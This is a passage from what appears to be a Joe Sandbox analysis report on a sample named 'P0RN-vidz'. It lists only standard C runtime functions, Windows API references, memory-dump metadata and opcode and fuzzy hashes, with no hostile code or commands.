                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB9,00371300), ref: 00371AB2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                          • Opcode ID: 496d626f58c13cd0ac59a7aee4c2b7ffd06df47ee001dca3d02f871842109190
                                                                                                                                                                                                                                          • Instruction ID: 57fda8cd781b5e2a581381ad964ed22cdfdc4b2f99a345e12e278856433185de
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 496d626f58c13cd0ac59a7aee4c2b7ffd06df47ee001dca3d02f871842109190
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                          • Opcode ID: 19e5050806b861c7c68cfbad505f49acdb1b587fe1c1f72898f938bbe440fdde
                                                                                                                                                                                                                                          • Instruction ID: 5f53f8d3beb570d6f3c7c91e19677a922b7562ae9a41ee3c8dd88b9d51fca2dd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19e5050806b861c7c68cfbad505f49acdb1b587fe1c1f72898f938bbe440fdde
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6AA002706012059B97518F355A5930975AD5645791F5540655509C5160E72444905B11

                                                                                                                                                                                                                                          Control-flow Graph (legend: Executed, Not Executed)
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 0037669B
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 003761E5
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 003761F7
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 00376209
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 0037621B
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 0037622D
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 0037623F
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 00376251
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 00376263
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 00376275
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 00376287
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 00376299
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 003762AB
                                                                                                                                                                                                                                            • Part of subcall function 003761C8: _free.LIBCMT ref: 003762BD
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376690
                                                                                                                                                                                                                                            • Part of subcall function 003749B9: HeapFree.KERNEL32(00000000,00000000,?,0037635D,?,00000000,?,00000000,?,00376384,?,00000007,?,?,003767EF,?), ref: 003749CF
                                                                                                                                                                                                                                            • Part of subcall function 003749B9: GetLastError.KERNEL32(?,?,0037635D,?,00000000,?,00000000,?,00376384,?,00000007,?,?,003767EF,?,?), ref: 003749E1
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003766B2
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003766C7
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003766D2
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003766F4
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376707
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376715
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376720
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376758
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0037675F
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0037677C
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376794
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                                                                                          • Opcode ID: 676272a50b19d6e96ceb55e5b31b886e33238e2189089000eb78f763bdb4b247
                                                                                                                                                                                                                                          • Instruction ID: 490cec1cb56d84e89eefcbc5068fa6165619de766484823712f0ea31e3fffd0d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 676272a50b19d6e96ceb55e5b31b886e33238e2189089000eb78f763bdb4b247
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05319E31600B019FEB36AA79E856B5673E9EF02350F55C419E54DEB292DF39BD40CB10

                                                                                                                                                                                                                                          Control-flow Graph (legend: Executed, Not Executed)
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00374494
                                                                                                                                                                                                                                            • Part of subcall function 003749B9: HeapFree.KERNEL32(00000000,00000000,?,0037635D,?,00000000,?,00000000,?,00376384,?,00000007,?,?,003767EF,?), ref: 003749CF
                                                                                                                                                                                                                                            • Part of subcall function 003749B9: GetLastError.KERNEL32(?,?,0037635D,?,00000000,?,00000000,?,00376384,?,00000007,?,?,003767EF,?,?), ref: 003749E1
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003744A0
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003744AB
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003744B6
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003744C1
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003744CC
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003744D7
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003744E2
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003744ED
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003744FB
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                          • Opcode ID: b32ca2cab056e605b5ff187fc0f7b984621249691e4a1c1ad85087e34b035ece
                                                                                                                                                                                                                                          • Instruction ID: 63303d1dc97cadb1f12a7f83ae890cb1039eb0046417664e9dedd9e8df62e5bc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b32ca2cab056e605b5ff187fc0f7b984621249691e4a1c1ad85087e34b035ece
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74114476510108FFDB12EF95D942DDA3BA5EF06350B5181A6BB4C8F222DB35EA50DF80

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00371F87
                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00371F8F
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00372018
                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00372043
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00372098
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                          • String ID: csm$ 7
                                                                                                                                                                                                                                          • API String ID: 1170836740-1596769016
                                                                                                                                                                                                                                          • Opcode ID: 59ecd8231d2c6da7cb1cf2336bb6e556a3525219da16a64e776f18a1fda4bb6d
                                                                                                                                                                                                                                          • Instruction ID: f4eff701c78e46b465673930112d2281a6b5277ea4588a13907102a16d0a165e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59ecd8231d2c6da7cb1cf2336bb6e556a3525219da16a64e776f18a1fda4bb6d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D541A234A00248ABCF32DF69C884A9FBBB5FF45324F14C155E81D9B392D739A955CBA0

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00375618,00000000,?,?,?,00377E55,?,?,00000100), ref: 00377C5E
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00377C96
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00377E55,?,?,00000100,5EFC4D8B,?,?), ref: 00377CE4
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00377D7B
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00377DDE
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00377DEB
                                                                                                                                                                                                                                            • Part of subcall function 0037644F: HeapAlloc.KERNEL32(00000000,?,00000004,?,00377FAB,?,00000000,?,003769BF,?,00000004,00000000,?,?,?,00373D1D), ref: 00376481
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00377DF4
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00377E19
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2597970681-0
                                                                                                                                                                                                                                          • Opcode ID: 607781e9a58aafd1419e304750cee0041a4ee1f2e7d333e1c37049d30ef7c670
                                                                                                                                                                                                                                          • Instruction ID: ebb63328c38fc8dca7469a8438acc46b92311d00cfb0ef3ad4235e8d5dfd541c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 607781e9a58aafd1419e304750cee0041a4ee1f2e7d333e1c37049d30ef7c670
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D251D072604216ABDB378F64CC92EBB77AAEF44750F168628FC1CDA180EB78DC51C650

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00378CDC,?,00000000,?,00000000,00000000), ref: 003785A9
                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 00378624
                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 0037863F
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00378665
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,00378CDC,00000000,?,?,?,?,?,?,?,?,?,00378CDC,?), ref: 00378684
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,00378CDC,00000000,?,?,?,?,?,?,?,?,?,00378CDC,?), ref: 003786BD
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                                                                                          • Opcode ID: 9d4106c71564aa53112b895134e7dc964056db9078b8b1d65e486c12e9fb15eb
                                                                                                                                                                                                                                          • Instruction ID: 606e4d30a2fd4def47a809b64521126678d547164146782345fcc8529448c864
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d4106c71564aa53112b895134e7dc964056db9078b8b1d65e486c12e9fb15eb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2451C671A00249AFDB26CFA8DC45AEEBBF8FF08300F14855AE559E7291DB34D941CB61

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0037632F: _free.LIBCMT ref: 00376358
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003763B9
                                                                                                                                                                                                                                            • Part of subcall function 003749B9: HeapFree.KERNEL32(00000000,00000000,?,0037635D,?,00000000,?,00000000,?,00376384,?,00000007,?,?,003767EF,?), ref: 003749CF
                                                                                                                                                                                                                                            • Part of subcall function 003749B9: GetLastError.KERNEL32(?,?,0037635D,?,00000000,?,00000000,?,00376384,?,00000007,?,?,003767EF,?,?), ref: 003749E1
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003763C4
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003763CF
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376423
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0037642E
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376439
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376444
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 776569668-0

                                                                                                                                                                                                                                          [Figure: Control-flow Graph; legend: Executed, Not Executed]
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00372518,003721EF,00371AFD), ref: 0037252F
                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0037253D
                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00372556
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,00372518,003721EF,00371AFD), ref: 003725A8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3852720340-0

                                                                                                                                                                                                                                          [Figure: Control-flow Graph; legend: Executed, Not Executed]
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000008,?,00376EB9,?,?,?,003804D8,0000002C,00374084,00000016,003721EF,00371AFD), ref: 00374578
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003745AB
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003745D3
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 003745E0
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 003745EC
                                                                                                                                                                                                                                          • _abort.LIBCMT ref: 003745F2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3160817290-0

                                                                                                                                                                                                                                          [Figure: Control-flow Graph; legend: Executed, Not Executed]
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,003737FD,?,?,0037379D,?,003802F0,0000000C,003738F4,?,00000002), ref: 0037386C
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0037387F
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,003737FD,?,?,0037379D,?,003802F0,0000000C,003738F4,?,00000002,00000000), ref: 003738A2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045

                                                                                                                                                                                                                                          [Figure: Control-flow Graph; legend: Executed, Not Executed]
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,00375618,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 003764EA
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00376522
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00376573
                                                                                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00376585
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 0037658E
                                                                                                                                                                                                                                            • Part of subcall function 0037644F: HeapAlloc.KERNEL32(00000000,?,00000004,?,00377FAB,?,00000000,?,003769BF,?,00000004,00000000,?,?,?,00373D1D), ref: 00376481
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1857427562-0

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00375777
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0037579A
                                                                                                                                                                                                                                            • Part of subcall function 0037644F: HeapAlloc.KERNEL32(00000000,?,00000004,?,00377FAB,?,00000000,?,003769BF,?,00000004,00000000,?,?,?,00373D1D), ref: 00376481
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 003757C0
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003757D3
                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003757E2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2278895681-0

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,0037494E,00377FC9,?,003769BF,?,00000004,00000000,?,?,?,00373D1D,?,00000000), ref: 003745FD
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00374632
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00374659
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00374666
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 0037466F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3170660625-0

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003762DE
                                                                                                                                                                                                                                            • Part of subcall function 003749B9: HeapFree.KERNEL32(00000000,00000000,?,0037635D,?,00000000,?,00000000,?,00376384,?,00000007,?,?,003767EF,?), ref: 003749CF
                                                                                                                                                                                                                                            • Part of subcall function 003749B9: GetLastError.KERNEL32(?,?,0037635D,?,00000000,?,00000000,?,00376384,?,00000007,?,?,003767EF,?,?), ref: 003749E1
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003762F0
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376302
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376314
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376326
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00373EFD
